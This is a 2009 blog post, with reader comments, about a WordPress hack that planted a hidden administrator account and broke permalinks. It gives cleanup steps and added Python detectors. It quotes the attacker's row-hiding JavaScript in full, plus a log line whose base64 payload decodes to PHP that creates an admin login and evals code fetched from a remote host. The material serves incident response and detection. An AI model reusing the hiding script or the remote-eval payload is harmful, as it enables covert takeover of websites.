WordPress Blog PermaLinks Hacked by “ElijahHastings65”!
This morning, I discovered that all of my permalinks (e.g. http://blog.nachotech.com/?p=119) were broken. When the permalinks were used, they would redirect to a URL that was partially correct, but had some extra code added to the end. Here’s what I would see on the end of the URLs:
/wordpress %&evalbase64_decode_SERVERHTTP_REFERER.+&%/
This seems harmless, but it breaks all the permalinks (which is the main way people visit my site, since that’s what Google shows.)
Your users will see an HTTP 400 BAD REQUEST error saying “Your browser sent a request that the server could not understand” like this:

I’ve done a lot of searching on the Internet for solutions, but haven’t found a good description of this particular hack yet, and no confirmation that this vulnerability is fixed in WordPress 2.8.4. However, here are the pertinent threads I have found:
http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/
http://wordpress.org/support/topic/307518?replies=16
http://wordpress.org/support/topic/297639
I have also found this page to be helpful, although it doesn’t describe this particular hack:
http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
As you can read in the above threads, the hacker (or the hacker’s bot-net) inserts a new Administrator user in your blog using SQL injection. If you look at your wp-admin’s Users page, you’ll see that the count of Administrator role users is one more than you had before. In my case, it showed “Administrator (2)” which indicates there are two administrator users. However, this new user added by the hacker has a clever First Name that includes some javascript to hide the user from the page. So I only saw 1 user in the list of Administrator users, not the 2 that are indicated.
HOW TO FIND AND DELETE THE HIDDEN ADMINISTRATOR
To find the hidden user, go to the /wp-admin/users.php page and click the link near the top of the page to view only Administrators. The page rendered in the browser will not show the hidden administrator, but you can “view source” of this page, and you’ll find the additional username somewhere in the HTML. Search for “tr id”. The key thing to find is the user id (e.g. “user-123”), which then can be used with the following URL, substituting the hacker’s user id (e.g. “123”) for NNN:
http://[your site URL here]/wp-admin/user-edit.php?user_id=NNN
Once you’re in the page to edit the user, you can change its role back to “Subscriber” and delete the bogus ‘first name’ field. (Also you’ll have to insert a bogus email address so that you can save your changes.) After saving the changes, return to the normal user list, and select this user and delete it.
NOTE: there are many more steps you’ll need to do in order to make sure your WordPress site is clean. Please consult the “My site was hacked” FAQ for more instructions.
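To make the “view source” step above less error-prone, here is an added Python script (not from the original post) that scans the raw HTML of /wp-admin/users.php?role=administrator for every tr id="user-NNN" row, flags rows whose profile fields smuggle a script tag, and compares the page’s own “Administrator (N)” count against the script-free rows. The HTML sample is constructed and simplified, not a capture from the author’s site.

```python
import re

# Constructed, simplified excerpt of the raw HTML behind /wp-admin/users.php?role=administrator
# (WordPress 2.8 layout): the role filter links, then one <tr id="user-N"> row per account.
# The second row carries a <script> in a profile field, as the hidden admin in the post did.
SAMPLE_USERS_HTML = """
<ul class="subsubsub"><li><a href="users.php">All (7)</a> |</li>
<li><a href="users.php?role=administrator" class="current">Administrator (2)</a></li></ul>
<table class="widefat"><tbody id="users">
<tr id="user-1" class="alternate">
<td class="username column-username"><strong><a href="user-edit.php?user_id=1">iggy</a></strong></td>
<td class="name column-name">Iggy Example</td><td class="role column-role">Administrator</td></tr>
<tr id="user-123">
<td class="username column-username"><strong><a href="user-edit.php?user_id=123">ElijahHastings65</a></strong></td>
<td class="name column-name"><div id="user_superuser"><script language="JavaScript">
addLoadEvent(function(){ /* row-hiding code elided in this constructed sample */ });</script></div></td>
<td class="role column-role">Administrator</td></tr>
</tbody></table>
"""

ROW_RE = re.compile(r'<tr id="user-(\d+)"[^>]*>(.*?)</tr>', re.S)
LOGIN_RE = re.compile(r'user_id=\d+">([^<]+)</a>')
ADMIN_COUNT_RE = re.compile(r'>Administrator \((\d+)\)<')  # same text the hiding script targets

def list_user_rows(html):
    """Every user row present in the source, whether or not a browser would display it."""
    rows = []
    for m in ROW_RE.finditer(html):
        body = m.group(2)
        login = LOGIN_RE.search(body)
        rows.append({"user_id": int(m.group(1)),
                     "login": login.group(1) if login else None,
                     "has_script": "<script" in body.lower()})
    return rows

def hidden_users(html):
    """Rows that smuggle a <script> tag: the ids to open via user-edit.php?user_id=NNN."""
    return [r for r in list_user_rows(html) if r["has_script"]]

def admin_count_shown(html):
    """The N in the page's own 'Administrator (N)' filter link, or 0 if absent."""
    m = ADMIN_COUNT_RE.search(html)
    return int(m.group(1)) if m else 0

def count_mismatch(html):
    """True when the role filter claims more administrators than script-free rows exist."""
    visible = [r for r in list_user_rows(html) if not r["has_script"]]
    return admin_count_shown(html) != len(visible)
```

Run it against a saved copy of the page source rather than the live admin page so that nothing in the smuggled field executes.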
HOW THE HACKER HID THE NEW ADMINISTRATOR ACCOUNT
In my case, the hacker’s nickname in my WordPress user list was ElijahHastings65. Here is the clever “First Name” field that ended up hiding the hacker in the user list:
<input id="first_name" name="first_name" type="text" value="...
<div id="user_superuser"><script language="JavaScript">
var setUserName = function(){
  try{
    // Walk up from the marker <div> to the enclosing <tr> and remove the whole row,
    // so the account never appears in the rendered user list.
    var t=document.getElementById("user_superuser");
    while(t.nodeName!="TR"){
      t=t.parentNode;
    };
    t.parentNode.removeChild(t);
    // Decrement any <h3> heading that ends in " shown below" by one.
    var tags = document.getElementsByTagName("H3");
    var s = " shown below";
    for (var i = 0; i < tags.length; i++) {
      var t=tags[i].innerHTML;
      var h=tags[i];
      if(t.indexOf(s)>0){
        s =(parseInt(t)-1)+s;
        h.removeChild(h.firstChild);
        t = document.createTextNode(s);
        h.appendChild(t);
      }
    }
    // Decrement the "Administrator (N)" count in the role filter links.
    // As captured here the regex has no escapes (the \( \d \) are plain characters),
    // so exec() returns null and n[1] throws; the catch below swallows the error.
    // That matches what the post observed: the row was hidden but the count still read "Administrator (2)".
    var arr=document.getElementsByTagName("ul");
    for(var i in arr) if(arr[i].className=="subsubsub"){
      var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);
      if(n[1]>0){
        var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");
        arr[i].innerHTML=txt;
      }
    }
  }catch(e){};
};
addLoadEvent(setUserName);  // WordPress admin helper: run the function once the page has loaded
</script></div>" />
HOW TO FIND WHERE THE BOT ORIGINATED (MAYBE)
In my webserver’s log files I found more clues to when the attack occurred and from where it originated (IP Address 209.59.107.72):
209.59.107.72 - - [03/Sep/2009:19:49:29 -0700] "POST blog.nachotech.com/wp-login.php HTTP/1.1" 302 5 "http://blog.nachotech.com/wp-login.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20060601 Firefox/2.0.0.10 (Ubunen-USgy)"
209.59.107.72 - - [03/Sep/2009:19:49:39 -0700] "POST blog.nachotech.com/wp-admin//options-permalink.php HTTP/1.1" 200 10158 "http://blog.nachotech.com/wp-admin//options-permalink.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20060601 Firefox/2.0.0.10 (Ubunen-USgy)"
209.59.107.72 - - [03/Sep/2009:19:49:43 -0700] "POST blog.nachotech.com/xmlrpc.php HTTP/1.1" 200 204 "JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdFbGlqYWhIYXN0aW5nczY1JzskdXNlcl9wYXNzPSdPcTJ4N0RRSClQUkAnO2V2YWwoZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saW5rcy53ZWJ3b3JkcHJlc3MuY24vZGF0YS9zaG9ydHBhcnQyLnR4dCcpKTtleGl0Ow==" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20060601 Firefox/2.0.0.10 (Ubunen-USgy)"
I suspect that it is this last line (the POST with the “JHJvbGU9J2FkbW…” contents) that is responsible for the PermaLink hack. However, I have no confirmation of this yet. If anyone has any more info, please email me at i...@nachotech.com or leave a comment below.
Here is a hex dump of this suspicious payload to help others who might be searching for clues:
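As an added example (not part of the original post), the following Python detector runs over access-log lines in Apache combined format and flags POSTs to xmlrpc.php whose Referer field is not a URL but a base64 blob that decodes to PHP source. The first three sample lines are the author’s log entries quoted above; the fourth is a constructed benign request for contrast. Decoded payloads are checked in memory and never echoed.

```python
import base64
import binascii
import re

# Apache "combined" log format: ip ident user [time] "method path proto" status bytes "referer" "ua"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$')
PHP_MARKERS = ("eval(", "base64_decode(", "file_get_contents(")

# The first three lines are the author's own log entries quoted in the post;
# the fourth is a constructed, benign request added for contrast.
SAMPLE_LOG = [
    '209.59.107.72 - - [03/Sep/2009:19:49:29 -0700] "POST blog.nachotech.com/wp-login.php HTTP/1.1" 302 5 "http://blog.nachotech.com/wp-login.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20060601 Firefox/2.0.0.10 (Ubunen-USgy)"',
    '209.59.107.72 - - [03/Sep/2009:19:49:39 -0700] "POST blog.nachotech.com/wp-admin//options-permalink.php HTTP/1.1" 200 10158 "http://blog.nachotech.com/wp-admin//options-permalink.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20060601 Firefox/2.0.0.10 (Ubunen-USgy)"',
    '209.59.107.72 - - [03/Sep/2009:19:49:43 -0700] "POST blog.nachotech.com/xmlrpc.php HTTP/1.1" 200 204 "JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdFbGlqYWhIYXN0aW5nczY1JzskdXNlcl9wYXNzPSdPcTJ4N0RRSClQUkAnO2V2YWwoZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saW5rcy53ZWJ3b3JkcHJlc3MuY24vZGF0YS9zaG9ydHBhcnQyLnR4dCcpKTtleGl0Ow==" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20060601 Firefox/2.0.0.10 (Ubunen-USgy)"',
    '198.51.100.7 - - [03/Sep/2009:20:01:02 -0700] "POST /xmlrpc.php HTTP/1.1" 200 512 "http://example.invalid/editor" "Mozilla/5.0 (constructed)"',
]

def decode_if_base64_text(value):
    """Decoded text when `value` is a base64 blob of printable ASCII, else None."""
    if len(value) < 16 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, ValueError):  # bad padding, bad alphabet, or non-ASCII bytes
        return None
    return text if text.isprintable() else None

def classify(line):
    """Reason string for a request matching the pattern in the post, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _when, method, path, _status, referer, _ua = m.groups()
    if method != "POST" or not path.endswith("/xmlrpc.php"):
        return None
    decoded = decode_if_base64_text(referer)
    if decoded is None:
        return None  # a normal URL (or nothing) in the Referer field
    if any(marker in decoded for marker in PHP_MARKERS):
        return f"{ip}: POST {path} with base64 Referer carrying PHP code"
    return f"{ip}: POST {path} with non-URL base64 Referer"

def suspicious_requests(lines):
    """Reasons for every flagged line, in log order."""
    return [r for r in map(classify, lines) if r]
```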
HOW TO KEEP THIS HACK FROM HAPPENING
For now, I have simply renamed my xmlrpc.php file so that it is deactivated. I have read that the latest WordPress version 2.8.4 does not have this vulnerability, but I haven’t had time to update yet (thanks to GoDaddy’s slow response time making hosting changes).
UPDATE 9/6/9: I have manually upgraded WordPress to 2.8.4 (WordPress says it is not vulnerable to this attack). So far, my PermaLinks are working.


September 7th, 2009 at 9:04 am
Thank you for posting this, my host doesn’t really let me see the logs, but you’ve provided me with what I was looking for. You were correct, the offending string was the JHJvbGU9J2FkbW… and it was base64 encoded. I decoded it via JavaScript and found that yes, it’s providing the user data to add to wordpress, then it’s executing a remote script which starts by calling the registration file of the blog it’s trying to hack. If I’m reading the code correctly, it looks like it’s trying to delete any administrator account over ID 25 that has the same first name of the admin being added, then it finishes creating the XML data for the new admin being injected and adds the user meta info (with the javascript that hides it in the users control panel), then it updates the option to not let any other users register.
And if you don’t believe me, I can tell you that your erroneous admin had the user name `ElijahHastings65`
September 7th, 2009 at 10:58 am
marion – thank you very much for the comment. I would appreciate seeing the decoded source of the hack – can you email it to me at i…@nachotech.com? I won’t post it on my blog – I am just interested in inspecting it.
Thanks,
Iggy
September 8th, 2009 at 11:16 pm
Hello,
I’m having trouble following your instructions for removing the hidden administrator. I upgraded WP to the latest version before I discovered the hidden administrator, who had changed my permalink structure (which I changed back). What “ID” am I looking for? I did find what I thought was an ID, then added it to the url that you provided, but all it did was bring up a website. And from there I’m lost. What page to edit? Am I editing this page in my hosting account or directly in wordpress?
Thanks for your help
September 9th, 2009 at 5:08 am
[...] thanks to the guys at NachoTech. The post there helped me sort out and fix my WP issues with a minimal loss of data. Share and [...]
September 9th, 2009 at 8:16 am
cavpres – thanks for your comment. I had an error in the URL due to my own upgrade of WordPress. I’ve corrected that and also explained things a bit better. Please read the “How To Find And Delete” section again and let me know if it works for you now.
Thanks,
Iggy
September 9th, 2009 at 8:43 pm
Iggy,
Thanks, but I must be very dumb because I still cannot figure it out. Where do I put the URL, in my browser bar? Because when I do that it takes me to the login page for my blog. I saw two users in the view source code, 1 (which I think is me) and 5 (the bogus user) and I can also see a user name for this user as well. But I’m not being taken to any page to edit the info. Thanks again.
September 9th, 2009 at 11:05 pm
cavpres – As an example, if your blog is normally accessed as http://www.myblog.com/, and the user id you want to edit is “5”, then you would put “http://www.myblog.com/wp-admin/user-edit.php?user_id=5” into the browser’s Location/Address/URL field.
If that takes you to a login page, then go ahead and log in. You do need to be logged into your WordPress blog as an Administrator to be able to edit the users. If you are not taken to an “Edit User” page eventually, then perhaps your WordPress installation is non-standard. Are you hosting your blog at your own domain, or with WordPress.com?
Also, what is the bogus user name? I am wondering if all the hacks were with the same username. Good luck!
September 11th, 2009 at 6:38 pm
This a$$**** has got me to! I’m new and my site is screwed up. My permalinks are messed up and I can’t log into wp admin. How do I do this through the cpanel? I’m scared that I will mess the site up worse. I look forward to hearing from you. Thank you for your time.
Jason
September 12th, 2009 at 10:42 am
Hi Jason – thanks for your comment. Sorry to hear your site was attacked too. In my case, I was still able to log into wp-admin, so I didn’t have to resort to other measures. My hosting provider (GoDaddy) uses phpMyAdmin, not cPanel, so I’m not familiar with cPanel. If you do have access to cPanel, however, you should be able to use it to either change the administrator password, or create a new administrator user, which should then allow you to use wp-admin. Here’s a couple links that might help you get started: Using cPanel and cPanel FAQ.
I would also suggest that you contact your hosting provider for assistance. They may be able to restore your WordPress site and DB to a recent backup.
Good luck,
Iggy
September 14th, 2009 at 7:19 pm
[...] http://blog.nachotech.com/?p=125 [...]
September 27th, 2009 at 9:05 pm
Hi – thanks for taking the time to report on this! It looks as though the malicious script (or whatever it is) is a bit more seriously entrenched in the installation I am attempting to fix. When I try to view source my antivirus program gets all bent out of shape about threats. I also cannot download the user-edit.php file for the same reason (won’t allow me to do so for security reasons).
I WAS able to see the name of the evil admin (even though it vanishes from view very quickly) by first figuring out which page it was listed on (this site has many many subscribers, so I needed to dig through to find it), then I visited the page and took a screenshot right away. Sure enough, there was the bad admin username listed in the screenshot. I tried your approach with linking directly to that users edit page but it did not work.
You mentioned phpMyAdmin – could I manually remove the user using that program or will I encounter the same issues?
Any assistance you can provide will be greatly appreciated!
Thanks
B
November 11th, 2009 at 3:40 pm
[...] With that Users page open in Firefox, I followed the advice given in this excellent Nachotech post: I went to the View tab at the top of the page and selected Page Source, which pops up all the [...]
January 16th, 2010 at 4:02 am
I had problems as well with accounts hiding when they hacked my web site, thank you for explaining to us how to do it, especially I like that you showed us the code in your article. Thank you.